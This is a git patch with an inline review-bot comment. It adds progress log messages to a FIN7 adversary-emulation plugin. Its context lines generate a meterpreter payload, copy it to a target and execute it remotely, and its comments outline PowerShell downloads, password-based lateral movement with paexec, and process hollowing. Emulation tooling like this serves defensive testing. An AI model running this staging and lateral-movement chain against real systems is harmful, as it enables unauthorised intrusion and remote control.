From 0295fd88020c08853b4f0f0be99684e7b366512c Mon Sep 17 00:00:00 2001
From: Thorsten Sick
Date: Tue, 8 Jun 2021 12:06:31 +0200
Subject: [PATCH] using log level for output
---
 .../adversary_emulations/FIN7/fin7_section1.py | 13 ++++++++++++-
 1 file changed, 12 insertions(+), 1 deletion(-)
diff --git a/plugins/default/adversary_emulations/FIN7/fin7_section1.py b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
index 96d39c3..a8f92f1 100644
--- a/plugins/default/adversary_emulations/FIN7/fin7_section1.py
+++ b/plugins/default/adversary_emulations/FIN7/fin7_section1.py
@@ -93,6 +93,9 @@ class FIN7Plugin(AttackPlugin):
         self.attack_logger.vprint(
             f"{CommandlineColors.OKBLUE}Step 4: Staging Interactive Toolkit{CommandlineColors.ENDC}",
             1)
+        self.attack_logger.vprint(
+            f"{CommandlineColors.OKCYAN}Create babymetal replacement{CommandlineColors.ENDC}",
+            1)
         # Uploaded stager creates meterpreter shell (babymetal)
         # Generate payload:
 
@@ -106,11 +109,19 @@ class FIN7Plugin(AttackPlugin):
             outfile=payload_name)
         self.attacker_machine_plugin.get(payload_name, self.targets[0].get_machine_path_external())
         src = os.path.join(self.targets[0].get_machine_path_external(), payload_name)
+
+        self.attack_logger.vprint(
+            f"{CommandlineColors.OKCYAN}Deploy babymetal replacement{CommandlineColors.ENDC}",
+            1)
         self.targets[0].put(src, self.targets[0].get_playground())
         if self.targets[0].get_playground() is not None:
             pl = os.path.join(self.targets[0].get_playground(), payload_name)
         else:
             pl = payload_name
+
+        self.attack_logger.vprint(
+            f"{CommandlineColors.OKCYAN}Execute babymetal replacement - waiting for meterpreter shell{CommandlineColors.ENDC}",
+            1)
         self.targets[0].remote_run(pl, disown=True)
         # adb156.exe -> cmd.exe ->powershell.exe decodes embedded dll payload https://attack.mitre.org/techniques/T1059/003/ and https://attack.mitre.org/techniques/T1059/001/
 
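Review bot: The three new progress messages (`Create`, `Deploy` and `Execute babymetal replacement`, in this hunk and the second one) are passed the same verbosity value `1` as the `Step 4: Staging Interactive Toolkit` banner directly above them, so if the second `vprint` argument is a verbosity threshold (its semantics are not visible here) the sub-step chatter cannot be filtered independently of the step banners; passing `2` for the three new calls would keep the default output at step granularity. The message `Execute babymetal replacement - waiting for meterpreter shell` is printed immediately before `self.targets[0].remote_run(pl, disown=True)`, and nothing in the hunk waits for anything, so the text should describe only what this code does, e.g. `Execute babymetal replacement (disowned); meterpreter shell expected afterwards`, unless the wait happens in code beyond the hunk. The enclosing method begins before the first hunk and continues past the second.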
@@ -144,7 +155,7 @@ class FIN7Plugin(AttackPlugin):
         # powershell download: paexec.exe and hollow.exe https://attack.mitre.org/techniques/T1105/
         # spawn powershell through cmd
-        # use password with paexec to move lateral to it admin host https://attack.mitre.org/techniques/T1021/002/
+        # !!! admin host!!! use password with paexec to move lateral to it admin host https://attack.mitre.org/techniques/T1021/002/
         # paexec starts temorary windows service and executes hollow.exe https://attack.mitre.org/techniques/T1021/002/
         # hollow.exe spawns svchost and unmaps memory image https://attack.mitre.org/techniques/T1055/012/
         # svchost starts data exchange